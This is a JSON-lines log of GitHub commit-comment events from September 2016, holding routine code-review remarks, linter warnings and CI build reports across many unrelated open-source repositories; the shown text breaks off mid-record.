{"id":"4597719309","type":"CommitCommentEvent","actor":{"login":"sente"},"repo":{"name":"open-learning-exchange/BeLL-Apps"},"payload":{"comment":{"id":19117372,"position":null,"line":null,"path":null,"commit_id":"50ec2ce5d5837b7701c6bac27db812b36c508746","created_at":"2016-09-21T17:26:02Z","updated_at":"2016-09-21T17:26:02Z","body":"Is creating a new `PendingResources` model the best way to go about this?  I very well may be but the code is 95% the same as Resources.. makes me think there may be a better way.\r\n\r\nThoughts, @dogi, @umarWaris?\r\n\r\n"}},"created_at":"2016-09-21T17:26:02Z"}
{"id":"4597719874","type":"CommitCommentEvent","actor":{"login":"ptomin"},"repo":{"name":"uxmal/reko"},"payload":{"comment":{"id":19117373,"position":null,"line":null,"path":null,"commit_id":"58d8c8c8a3c93e32427ed833c6b38934b6fcf1f1","created_at":"2016-09-21T17:26:09Z","updated_at":"2016-09-21T17:26:09Z","body":"Thanks"}},"created_at":"2016-09-21T17:26:09Z"}
{"id":"4597719886","type":"CommitCommentEvent","actor":{"login":"igorcrexito"},"repo":{"name":"camilalaranjeira/RPV-VGG19"},"payload":{"comment":{"id":19117374,"position":null,"line":null,"path":null,"commit_id":"97f83120d06f1a8c20b30564c1ba2ccdaa0156b1","created_at":"2016-09-21T17:26:09Z","updated_at":"2016-09-21T17:26:09Z","body":"Cara, essa daí eu testei. O negócio é que se vc aumenta o tamanho do\nkernel, vc precisa aumentar o padding. O que faz todo sentido, já que as\ncamadas convolucionais não promovem redução de dimensionalidade (pelo menos\nnão nas arquiteturas da disciplina). Experimenta colocar um kernel 7x7 com\npadding 3, ou um kernel 9x9 com padding 4 (e por aí vai...).\n\nOn Wed, Sep 21, 2016 at 2:14 PM, raphaottoni <notifications@github.com>\nwrote:\n\n> Olá Igor,\n>\n> Continua dando segmentation fault aqui tanto no mac como no ubuntu =/\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/camilalaranjeira/RPV-VGG19/commit/97f83120d06f1a8c20b30564c1ba2ccdaa0156b1#commitcomment-19117200>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABCLRF8d5z_BSGk0mxE0QQUaqWQC6XyCks5qsWX5gaJpZM4KDDrH>\n> .\n>\n"}},"created_at":"2016-09-21T17:26:09Z"}
{"id":"4597728073","type":"CommitCommentEvent","actor":{"login":"raphendyr"},"repo":{"name":"Aalto-LeTech/a-plus"},"payload":{"comment":{"id":19117391,"position":25,"line":25,"path":"exercise/management/commands/tags.py","commit_id":"fc5002074fe94d8fedb481ed7bd264e2527acfe1","created_at":"2016-09-21T17:27:36Z","updated_at":"2016-09-21T17:27:36Z","body":"if not tag?"}},"created_at":"2016-09-21T17:27:36Z"}
{"id":"4597728531","type":"CommitCommentEvent","actor":{"login":"fashaikh"},"repo":{"name":"Azure/azure-webjobs-sdk-templates"},"payload":{"comment":{"id":19117392,"position":null,"line":null,"path":null,"commit_id":"65fcc426c95294578336b22147a2f47619c58135","created_at":"2016-09-21T17:27:40Z","updated_at":"2016-09-21T17:27:40Z","body":"Also, just noticed some of the standard template readme.md s we esacpe using the span tag e.g `# TimerTrigger - C<span>#</span>`\r\ne.g.  [readme.md](https://raw.githubusercontent.com/Azure/azure-webjobs-sdk-templates/dev/Templates/TimerTrigger-CSharp/readme.md)"}},"created_at":"2016-09-21T17:27:40Z"}
{"id":"4597729186","type":"CommitCommentEvent","actor":{"login":"goudylou"},"repo":{"name":"goudylou/hello-world"},"payload":{"comment":{"id":19117395,"position":null,"line":null,"path":null,"commit_id":"5d3fd443231c3a679a1d9384bd556a2eda07cc24","created_at":"2016-09-21T17:27:47Z","updated_at":"2016-09-21T17:27:47Z","body":"i initially created a master page to understand how to code."}},"created_at":"2016-09-21T17:27:47Z"}
{"id":"4597729792","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/positron"},"payload":{"comment":{"id":19117399,"position":null,"line":null,"path":null,"commit_id":"7878e520b2041fe1ca0893faacde8a52db642ec6","created_at":"2016-09-21T17:27:54Z","updated_at":"2016-09-21T17:27:54Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#Kfk2PCtRTkuuvvDm0wmcOg"}},"created_at":"2016-09-21T17:27:54Z"}
{"id":"4597731801","type":"CommitCommentEvent","actor":{"login":"damon-atkins"},"repo":{"name":"terminalmage/salt"},"payload":{"comment":{"id":19117405,"position":null,"line":null,"path":null,"commit_id":"f237fe4d528efd621e1f9adbeb149695e94e65a1","created_at":"2016-09-21T17:28:16Z","updated_at":"2016-09-21T17:28:16Z","body":"Re:  genrepo\r\ndoc string failhard  Missing default value setting, still be worth mentioning dict contains info about the errors.\r\n\r\nNeed to run it to look at the logging adjustment. Cannot notice anything obvious."}},"created_at":"2016-09-21T17:28:16Z"}
{"id":"4597732183","type":"CommitCommentEvent","actor":{"login":"deniscostadsc"},"repo":{"name":"pixelated/pixelated-user-agent"},"payload":{"comment":{"id":19117406,"position":14,"line":138,"path":"service/test/support/integration/app_test_client.py","commit_id":"8e7b7d53a6bef24ced29549746699f26595f4c71","created_at":"2016-09-21T17:28:20Z","updated_at":"2016-09-21T17:28:20Z","body":"What is the idea behind this code?\r\n\r\n```\r\nif(self._credentials[credentials.username] == credentials.password):\r\n```\r\n\r\nAre we really checking the user password here?"}},"created_at":"2016-09-21T17:28:20Z"}
{"id":"4597732894","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"seninp-bioinfo/MetaComp"},"payload":{"comment":{"id":19117407,"position":null,"line":null,"path":null,"commit_id":"6d8fc9936240abcdc9949bcb74359518ebd101c9","created_at":"2016-09-21T17:28:27Z","updated_at":"2016-09-21T17:28:27Z","body":"[R/convert_merge_table_to_phyloseq_otu_table.R:17:1:](https://github.com/seninp-bioinfo/MetaComp/blob/6d8fc9936240abcdc9949bcb74359518ebd101c9/R/convert_merge_table_to_phyloseq_otu_table.R#L17) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​convert_merge_table_to_phyloseq_otu_table <- function(filepath, TAXON){\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_convert_merge_table_to_phyloseq_otu_table.R:4:8:](https://github.com/seninp-bioinfo/MetaComp/blob/6d8fc9936240abcdc9949bcb74359518ebd101c9/tests/testthat/test_convert_merge_table_to_phyloseq_otu_table.R#L4) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​dat <- convert_merge_table_to_phyloseq_otu_table(\"../test_data/merged_table.tsv\", \"class\")\n       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_convert_merge_table_to_phyloseq_otu_table.R:21:22:](https://github.com/seninp-bioinfo/MetaComp/blob/6d8fc9936240abcdc9949bcb74359518ebd101c9/tests/testthat/test_convert_merge_table_to_phyloseq_otu_table.R#L21) *style:* **Commas should always have a space after.**\n```r\n​expect_that(sum(dat[,1]), equals(1.0))\n                     ^\n```\n[tests/testthat/test_convert_merge_table_to_phyloseq_otu_table.R:26:2:](https://github.com/seninp-bioinfo/MetaComp/blob/6d8fc9936240abcdc9949bcb74359518ebd101c9/tests/testthat/test_convert_merge_table_to_phyloseq_otu_table.R#L26) *style:* **Commented code should be removed.**\n```r\n​#expect_that(convert_merge_table_to_phyloseq_otu_table(\"../test_data/nonexistantfile.txt\", \"class\"), throws_error())\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_convert_merge_table_to_phyloseq_otu_table.R:27:1:](https://github.com/seninp-bioinfo/MetaComp/blob/6d8fc9936240abcdc9949bcb74359518ebd101c9/tests/testthat/test_convert_merge_table_to_phyloseq_otu_table.R#L27) *style:* **lines should not be more than 100 characters.**\n```r\n​expect_that(convert_merge_table_to_phyloseq_otu_table(\"../test_data/merged_table.tsv\", \"non_existent_taxa_level\"), throws_error())\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_convert_merge_table_to_phyloseq_otu_table.R:27:13:](https://github.com/seninp-bioinfo/MetaComp/blob/6d8fc9936240abcdc9949bcb74359518ebd101c9/tests/testthat/test_convert_merge_table_to_phyloseq_otu_table.R#L27) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​expect_that(convert_merge_table_to_phyloseq_otu_table(\"../test_data/merged_table.tsv\", \"non_existent_taxa_level\"), throws_error())\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2016-09-21T17:28:27Z"}
{"id":"4597742120","type":"CommitCommentEvent","actor":{"login":"mathewc"},"repo":{"name":"Azure/azure-webjobs-sdk-templates"},"payload":{"comment":{"id":19117427,"position":null,"line":null,"path":null,"commit_id":"65fcc426c95294578336b22147a2f47619c58135","created_at":"2016-09-21T17:30:08Z","updated_at":"2016-09-21T17:30:08Z","body":"So maybe we can just do that escaping rather than say we can't have any trailing #?"}},"created_at":"2016-09-21T17:30:08Z"}
{"id":"4597746631","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/electron"},"payload":{"comment":{"id":19117445,"position":null,"line":null,"path":null,"commit_id":"0ac2a5ce3c9f4d8c30a4f410194e1978f2262d28","created_at":"2016-09-21T17:30:59Z","updated_at":"2016-09-21T17:30:59Z","body":"wow only 2 char fix 👍 "}},"created_at":"2016-09-21T17:30:59Z"}
{"id":"4597748707","type":"CommitCommentEvent","actor":{"login":"thangngoc89"},"repo":{"name":"thangngoc89/react-howler"},"payload":{"comment":{"id":19117455,"position":13,"line":13,"path":"src/utils.js","commit_id":"f7e63827542a36af81d2a572eb17db5d355a99c3","created_at":"2016-09-21T17:31:22Z","updated_at":"2016-09-21T17:31:22Z","body":"After take a closer look, it seems like the old me is doing something tricky here. Probably need a refactor on this function. (Or remove it completely)"}},"created_at":"2016-09-21T17:31:22Z"}
{"id":"4597750338","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"seninp-bioinfo/MetaComp"},"payload":{"comment":{"id":19117460,"position":null,"line":null,"path":null,"commit_id":"db6e75b2c2ab6b2c9a5f52411bea48e9c97c13a6","created_at":"2016-09-21T17:31:40Z","updated_at":"2016-09-21T17:31:40Z","body":"[R/convert_merge_table_to_phyloseq_otu_table.R:17:1:](https://github.com/seninp-bioinfo/MetaComp/blob/db6e75b2c2ab6b2c9a5f52411bea48e9c97c13a6/R/convert_merge_table_to_phyloseq_otu_table.R#L17) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​convert_merge_table_to_phyloseq_otu_table <- function(filepath, TAXON){\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_convert_merge_table_to_phyloseq_otu_table.R:4:8:](https://github.com/seninp-bioinfo/MetaComp/blob/db6e75b2c2ab6b2c9a5f52411bea48e9c97c13a6/tests/testthat/test_convert_merge_table_to_phyloseq_otu_table.R#L4) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​dat <- convert_merge_table_to_phyloseq_otu_table(\"../test_data/merged_table.tsv\", \"class\")\n       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_convert_merge_table_to_phyloseq_otu_table.R:21:22:](https://github.com/seninp-bioinfo/MetaComp/blob/db6e75b2c2ab6b2c9a5f52411bea48e9c97c13a6/tests/testthat/test_convert_merge_table_to_phyloseq_otu_table.R#L21) *style:* **Commas should always have a space after.**\n```r\n​expect_that(sum(dat[,1]), equals(1.0))\n                     ^\n```\n[tests/testthat/test_convert_merge_table_to_phyloseq_otu_table.R:26:13:](https://github.com/seninp-bioinfo/MetaComp/blob/db6e75b2c2ab6b2c9a5f52411bea48e9c97c13a6/tests/testthat/test_convert_merge_table_to_phyloseq_otu_table.R#L26) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​expect_that(convert_merge_table_to_phyloseq_otu_table(\"../test_data/merged_table.tsv\",\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2016-09-21T17:31:40Z"}
{"id":"4597756314","type":"CommitCommentEvent","actor":{"login":"adsharma"},"repo":{"name":"adsharma/flatbuffers"},"payload":{"comment":{"id":19117477,"position":7,"line":383,"path":"include/flatbuffers/flatbuffers.h","commit_id":"51f46e430b39fe9a0cc0817918e2cb3b5e72b8d7","created_at":"2016-09-21T17:32:44Z","updated_at":"2016-09-21T17:32:44Z","body":"virtual was a way to try and reuse much of the Vector/String code for IVector/IString. I can try to figure out another way of code reuse."}},"created_at":"2016-09-21T17:32:44Z"}
{"id":"4597762106","type":"CommitCommentEvent","actor":{"login":"adsharma"},"repo":{"name":"adsharma/flatbuffers"},"payload":{"comment":{"id":19117486,"position":6,"line":56,"path":"include/flatbuffers/idl.h","commit_id":"51f46e430b39fe9a0cc0817918e2cb3b5e72b8d7","created_at":"2016-09-21T17:33:48Z","updated_at":"2016-09-21T17:33:48Z","body":"I can't think of any other way of implementing a string/vector that doesn't store length right next to the data. How hard is it to get other languages to safely ignore it?"}},"created_at":"2016-09-21T17:33:48Z"}
{"id":"4597762347","type":"CommitCommentEvent","actor":{"login":"bwagnerr"},"repo":{"name":"pixelated/pixelated-user-agent"},"payload":{"comment":{"id":19117488,"position":14,"line":138,"path":"service/test/support/integration/app_test_client.py","commit_id":"8e7b7d53a6bef24ced29549746699f26595f4c71","created_at":"2016-09-21T17:33:51Z","updated_at":"2016-09-21T17:33:51Z","body":"Yes, in a crude way. The idea is that we use the add_user method to explicitly add new users to the test and only those users are authenticated"}},"created_at":"2016-09-21T17:33:51Z"}
{"id":"4597762887","type":"CommitCommentEvent","actor":{"login":"Steve4448"},"repo":{"name":"NexusTools/Chesty"},"payload":{"comment":{"id":19117490,"position":null,"line":null,"path":null,"commit_id":"421b8f077efb76d2ba1467a1210312cb5df3b19d","created_at":"2016-09-21T17:33:57Z","updated_at":"2016-09-21T17:33:57Z","body":"I don't like how the Windows GitHub client added this a default commit including those random emoticons..."}},"created_at":"2016-09-21T17:33:57Z"}
{"id":"4597768443","type":"CommitCommentEvent","actor":{"login":"IAmNotHanni"},"repo":{"name":"inexor-game/code"},"payload":{"comment":{"id":19117522,"position":19,"line":73,"path":"inexor/entity/EntitySystem.hpp","commit_id":"0d36c67b4151fc01a768afc4a868cba596372d10","created_at":"2016-09-21T17:34:59Z","updated_at":"2016-09-21T17:34:59Z","body":"ok"}},"created_at":"2016-09-21T17:34:59Z"}
{"id":"4597770776","type":"CommitCommentEvent","actor":{"login":"penduin"},"repo":{"name":"netmail-open/wjelement"},"payload":{"comment":{"id":19117526,"position":null,"line":null,"path":null,"commit_id":"d5898528ca89978f2996248dbb04ec8c4cc55dc3","created_at":"2016-09-21T17:35:24Z","updated_at":"2016-09-21T17:35:24Z","body":"Oh, no that doesn't seem right.  I did some initial tests but must\nhave missed that.  I'll investigate further.\n\nOn 9/21/16, Daniel Carcich <notifications@github.com> wrote:\n> After running my unit tests, I noticed that this change modified the default\n> behavior for the _required_ schema keyword. For example:\n>\n> Schema:\n> `{ \"type\": \"object\", \"properties\": { \"test\": { \"type\": \"integer\" } },\n> \"required\": [ \"test\" ] }`\n>\n> Input:\n> `{ \"TEST\": 0 }`\n>\n> The validation used to return false (because the property name was incorrect\n> and failed the required check), but now returns true. Was this intended?\n>\n> --\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly or view it on GitHub:\n> https://github.com/netmail-open/wjelement/commit/d5898528ca89978f2996248dbb04ec8c4cc55dc3#commitcomment-19112789\n"}},"created_at":"2016-09-21T17:35:24Z"}
{"id":"4597775055","type":"CommitCommentEvent","actor":{"login":"soninaren"},"repo":{"name":"Azure/azure-webjobs-sdk-templates"},"payload":{"comment":{"id":19117535,"position":null,"line":null,"path":null,"commit_id":"65fcc426c95294578336b22147a2f47619c58135","created_at":"2016-09-21T17:36:10Z","updated_at":"2016-09-21T17:36:10Z","body":"Just tested using the span tag, did not work for me, i could see <span>#<span> in the portal"}},"created_at":"2016-09-21T17:36:10Z"}
{"id":"4597777347","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19117539,"position":null,"line":null,"path":null,"commit_id":"5822760f472a91651701acce2fce3fa92fe6a3f5","created_at":"2016-09-21T17:36:34Z","updated_at":"2016-09-21T17:36:34Z","body":"129956421-Scalable-Sizing-HTRad-Heat-Crash (mjwitte) - x86_64-MacOS-10.9-clang: OK (2334 of 2334 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5822760f472a91651701acce2fce3fa92fe6a3f5-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5822760f472a91651701acce2fce3fa92fe6a3f5-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-21T17:36:34Z"}
{"id":"4597777802","type":"CommitCommentEvent","actor":{"login":"lgolding"},"repo":{"name":"sarif-standard/sarif-spec"},"payload":{"comment":{"id":19117540,"position":37,"line":3266,"path":"document/FileFormat.mdk","commit_id":"21a216bc5114f361c1080ca9d6a96cae9bb15daa","created_at":"2016-09-21T17:36:40Z","updated_at":"2016-09-21T17:36:40Z","body":"\"relevant\""}},"created_at":"2016-09-21T17:36:40Z"}
{"id":"4597782756","type":"CommitCommentEvent","actor":{"login":"spaceloop123"},"repo":{"name":"zidabah/university_labs"},"payload":{"comment":{"id":19117549,"position":9,"line":9,"path":"Lab3_12/src/com/company/ReverseString.java","commit_id":"4594ba032557c5e7d00414ad9a34cc0ad2256182","created_at":"2016-09-21T17:37:36Z","updated_at":"2016-09-21T17:37:36Z","body":"Опять много стрингбуфферов создаешь. Юзай один и обновляй его на каждой итерации."}},"created_at":"2016-09-21T17:37:36Z"}
{"id":"4597784887","type":"CommitCommentEvent","actor":{"login":"tehkaiyu"},"repo":{"name":"Mtls/NetworkedPilotGame"},"payload":{"comment":{"id":19117556,"position":null,"line":null,"path":null,"commit_id":"2667ba02bb7df0da48eb8093d6e0de78392f8cb6","created_at":"2016-09-21T17:37:59Z","updated_at":"2016-09-21T17:37:59Z","body":"Lgtm\r\n![gg](https://cloud.githubusercontent.com/assets/4271679/14215651/1ec642f0-f7f9-11e5-8a8b-1133354c6305.gif)"}},"created_at":"2016-09-21T17:37:59Z"}
{"id":"4597788511","type":"CommitCommentEvent","actor":{"login":"lgolding"},"repo":{"name":"sarif-standard/sarif-spec"},"payload":{"comment":{"id":19117574,"position":94,"line":3323,"path":"document/FileFormat.mdk","commit_id":"21a216bc5114f361c1080ca9d6a96cae9bb15daa","created_at":"2016-09-21T17:38:40Z","updated_at":"2016-09-21T17:38:40Z","body":"\"ore\" => \"or\""}},"created_at":"2016-09-21T17:38:40Z"}
{"id":"4597791851","type":"CommitCommentEvent","actor":{"login":"hrkucuk"},"repo":{"name":"hrkucuk/hrkucuk.github.io"},"payload":{"comment":{"id":19117582,"position":null,"line":null,"path":null,"commit_id":"f95bf5d1bd3ef1ed5605313296e63b3acbc9873f","created_at":"2016-09-21T17:39:18Z","updated_at":"2016-09-21T17:39:18Z","body":"Example subposts will be deleted later."}},"created_at":"2016-09-21T17:39:18Z"}
{"id":"4597791969","type":"CommitCommentEvent","actor":{"login":"kevinkorte"},"repo":{"name":"kevinkorte/redrhino"},"payload":{"comment":{"id":19117583,"position":null,"line":null,"path":null,"commit_id":"caa5d5fcb0bf0fccafe6d05cde73115e5fe94b65","created_at":"2016-09-21T17:39:20Z","updated_at":"2016-09-21T17:39:20Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;YxVp5iTm&#x2F;26-google-maps-is-not-being-found-when-server-starts-up\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Google.maps is not being found when server starts up.</a>"}},"created_at":"2016-09-21T17:39:20Z"}
{"id":"4597792614","type":"CommitCommentEvent","actor":{"login":"raphaottoni"},"repo":{"name":"camilalaranjeira/RPV-VGG19"},"payload":{"comment":{"id":19117585,"position":null,"line":null,"path":null,"commit_id":"97f83120d06f1a8c20b30564c1ba2ccdaa0156b1","created_at":"2016-09-21T17:39:26Z","updated_at":"2016-09-21T17:39:26Z","body":"Fala ai Igor,\n\ntestei aqui com kernel 7 e padding 3, ficou bem borrada mas acho que ta\ncerto pq ainda posso ver \"a ideia\" da foto. Coloquei em anexo, olha ai e ve\nse concorda.\n\n\n\nSent with Mailtrack\n<https://mailtrack.io/install?source=signature&lang=en&referral=rapha.ottoni@gmail.com&idSignature=22>\n\nEm 21 de setembro de 2016 14:26, igorcrexito <notifications@github.com>\nescreveu:\n\n> Cara, essa daí eu testei. O negócio é que se vc aumenta o tamanho do\n> kernel, vc precisa aumentar o padding. O que faz todo sentido, já que as\n> camadas convolucionais não promovem redução de dimensionalidade (pelo menos\n> não nas arquiteturas da disciplina). Experimenta colocar um kernel 7x7 com\n> padding 3, ou um kernel 9x9 com padding 4 (e por aí vai...).\n>\n> On Wed, Sep 21, 2016 at 2:14 PM, raphaottoni <notifications@github.com>\n> wrote:\n>\n> > Olá Igor,\n> >\n> > Continua dando segmentation fault aqui tanto no mac como no ubuntu =/\n> >\n> > —\n> > You are receiving this because you authored the thread.\n> > Reply to this email directly, view it on GitHub\n> > <https://github.com/camilalaranjeira/RPV-VGG19/commit/\n> 97f83120d06f1a8c20b30564c1ba2ccdaa0156b1#commitcomment-19117200>,\n> > or mute the thread\n> > <https://github.com/notifications/unsubscribe-auth/ABCLRF8d5z_\n> BSGk0mxE0QQUaqWQC6XyCks5qsWX5gaJpZM4KDDrH>\n> > .\n> >\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/camilalaranjeira/RPV-VGG19/commit/97f83120d06f1a8c20b30564c1ba2ccdaa0156b1#commitcomment-19117374>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AEyLgnPsmYC99JCyxUkSmtmiHBW9ShIwks5qsWiygaJpZM4KDDrH>\n> .\n>\n\n\n\n-- \nRaphael Ottoni S M de Faria\n"}},"created_at":"2016-09-21T17:39:26Z"}
{"id":"4597794111","type":"CommitCommentEvent","actor":{"login":"jmassara"},"repo":{"name":"jmassara/packer-rhel7-vms"},"payload":{"comment":{"id":19117589,"position":null,"line":null,"path":null,"commit_id":"40bde365e0e5dbe53876ee71080cc01a391bd800","created_at":"2016-09-21T17:39:43Z","updated_at":"2016-09-21T17:39:43Z","body":"@amitvarma77 Hi, please make sure you are using the latest version of Packer. It uploads the installer to the image based on your VMWare installation."}},"created_at":"2016-09-21T17:39:43Z"}
{"id":"4597794723","type":"CommitCommentEvent","actor":{"login":"spaceloop123"},"repo":{"name":"zidabah/university_labs"},"payload":{"comment":{"id":19117590,"position":10,"line":13,"path":"Lab3_12/src/com/company/Main.java","commit_id":"4594ba032557c5e7d00414ad9a34cc0ad2256182","created_at":"2016-09-21T17:39:50Z","updated_at":"2016-09-21T17:39:50Z","body":"Не name file, а file name :)"}},"created_at":"2016-09-21T17:39:50Z"}
{"id":"4597797049","type":"CommitCommentEvent","actor":{"login":"Jack621"},"repo":{"name":"Jack621/hello-world"},"payload":{"comment":{"id":19117598,"position":null,"line":null,"path":null,"commit_id":"bb62790ce5dcde52a91e3b3633cb1452cb188784","created_at":"2016-09-21T17:40:15Z","updated_at":"2016-09-21T17:40:15Z","body":"hi to all fix on banshee"}},"created_at":"2016-09-21T17:40:15Z"}
{"id":"4597801885","type":"CommitCommentEvent","actor":{"login":"damon-atkins"},"repo":{"name":"terminalmage/salt"},"payload":{"comment":{"id":19117610,"position":null,"line":null,"path":null,"commit_id":"f237fe4d528efd621e1f9adbeb149695e94e65a1","created_at":"2016-09-21T17:41:08Z","updated_at":"2016-09-21T17:41:08Z","body":"Re: _repo_process_pkg_sls\r\n\r\n_failed_compile(msg) a good idea to save on repeated code.\r\n\r\nL717 Does not look correct, should not contain short_path_name, as you added for the log.error\r\n\r\nL734 the same  looks like errors array has not been set a shorter message without short_path_name\r\n"}},"created_at":"2016-09-21T17:41:08Z"}
{"id":"4597803575","type":"CommitCommentEvent","actor":{"login":"quant1729"},"repo":{"name":"QuantConnect/Lean"},"payload":{"comment":{"id":19117616,"position":42,"line":42,"path":"Common/Securities/Option/DefaultQLUnderlyingVolatilityEstimator.cs","commit_id":"b3590647b50d2103b1eb110740cccdb87218eb90","created_at":"2016-09-21T17:41:27Z","updated_at":"2016-09-21T17:41:27Z","body":"Those are QuantLib types. I*Estimator interfaces are designed to give user QL extention points once user started working with QL option pricing models. Types are used and live in QLOptionPriceModel class. Those types are not supposed to leak into the LEAN. "}},"created_at":"2016-09-21T17:41:27Z"}
{"id":"4597805420","type":"CommitCommentEvent","actor":{"login":"DarkTan"},"repo":{"name":"TheSoftwareFactory/experiment-server"},"payload":{"comment":{"id":19117622,"position":17,"line":377,"path":"experiment_server/models/db.py","commit_id":"f385370c5abc095fee8b93829ed699385b7ba578","created_at":"2016-09-21T17:41:50Z","updated_at":"2016-09-21T17:41:50Z","body":"what is this used for?"}},"created_at":"2016-09-21T17:41:50Z"}
{"id":"4597805738","type":"CommitCommentEvent","actor":{"login":"vilmes21"},"repo":{"name":"CodeCoreYVR/indie_arcade"},"payload":{"comment":{"id":19117625,"position":5,"line":4,"path":"app/views/games/_show_dev.html.erb","commit_id":"53a3eadeb0f5ad52f0a34b9884f760b09b18162d","created_at":"2016-09-21T17:41:54Z","updated_at":"2016-09-21T17:41:54Z","body":"delete this line"}},"created_at":"2016-09-21T17:41:54Z"}
{"id":"4597806293","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/libpalaso"},"payload":{"comment":{"id":19117626,"position":null,"line":null,"path":null,"commit_id":"515b583dc945fad4d0f39bba01f7d2f36c7885cc","created_at":"2016-09-21T17:42:00Z","updated_at":"2016-09-21T17:42:00Z","body":"TeamCity libpalaso :: palaso-win32-master Continuous [Build 3.0.776.515b583dc945fad4d0f39bba01f7d2f36c7885cc](http://build.palaso.org/viewLog.html?buildId=77019&buildTypeId=bt223) outcome was **SUCCESS**\nSummary: Tests passed: 3490, ignored: 126 Build time: 00:04:25"}},"created_at":"2016-09-21T17:42:00Z"}
{"id":"4597807930","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19117630,"position":null,"line":null,"path":null,"commit_id":"6ac19ea356df9fa833c65a19322ea952816ecb6f","created_at":"2016-09-21T17:42:17Z","updated_at":"2016-09-21T17:42:17Z","body":"EMS (brianlball) - x86_64-MacOS-10.10-clang: OK (2308 of 2480 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6ac19ea356df9fa833c65a19322ea952816ecb6f-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6ac19ea356df9fa833c65a19322ea952816ecb6f-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-93.06%25-yellow.svg)</a> \n"}},"created_at":"2016-09-21T17:42:17Z"}
{"id":"4597808180","type":"CommitCommentEvent","actor":{"login":"sosey"},"repo":{"name":"spacetelescope/iraf_replacement"},"payload":{"comment":{"id":19117631,"position":null,"line":null,"path":null,"commit_id":"cc0fe62a73d9b40ddf9989c5db826d27c7a54a14","created_at":"2016-09-21T17:42:19Z","updated_at":"2016-09-21T17:42:19Z","body":"@jhunkeler can you explain a little more?  We don't actually have an stsci-hst package, though I see a spec for one in astroconda which depends itself on stsci.tools. Are you packaging stsci.tools inside stsci-hst but still calling it stsci.tools? "}},"created_at":"2016-09-21T17:42:19Z"}
{"id":"4597813008","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/libpalaso"},"payload":{"comment":{"id":19117648,"position":null,"line":null,"path":null,"commit_id":"515b583dc945fad4d0f39bba01f7d2f36c7885cc","created_at":"2016-09-21T17:43:10Z","updated_at":"2016-09-21T17:43:10Z","body":"TeamCity libpalaso :: palaso-trusty64-lfmerge Continuous [Build 2.6.74.515b583dc945fad4d0f39bba01f7d2f36c7885cc](http://build.palaso.org/viewLog.html?buildId=77021&buildTypeId=PalasoPrecise64lfmergeContinuous) outcome was **FAILURE**\nSummary: Tests failed: 4, passed: 3466, ignored: 107 Build time: 00:05:16\n### Failed tests\n```\nSIL.Core.Tests.dll: SIL.Tests.IO.FileLock.SimpleFileLockTests.ReleaseLock_LockedByActiveProcess_LockFileExists: <no details avaliable>\n\nSIL.Core.Tests.dll: SIL.Tests.IO.FileLock.SimpleFileLockTests.TryAcquireLock_LockedByActiveProcess_ReturnsFalse: <no details avaliable>\n\nSIL.Core.Tests.dll: SIL.Tests.IO.FileLock.SimpleFileLockTests.TryAcquireLock_LockedByActiveProcessNotTimedOut_ReturnsFalse: <no details avaliable>\n\nSIL.Core.Tests.dll: 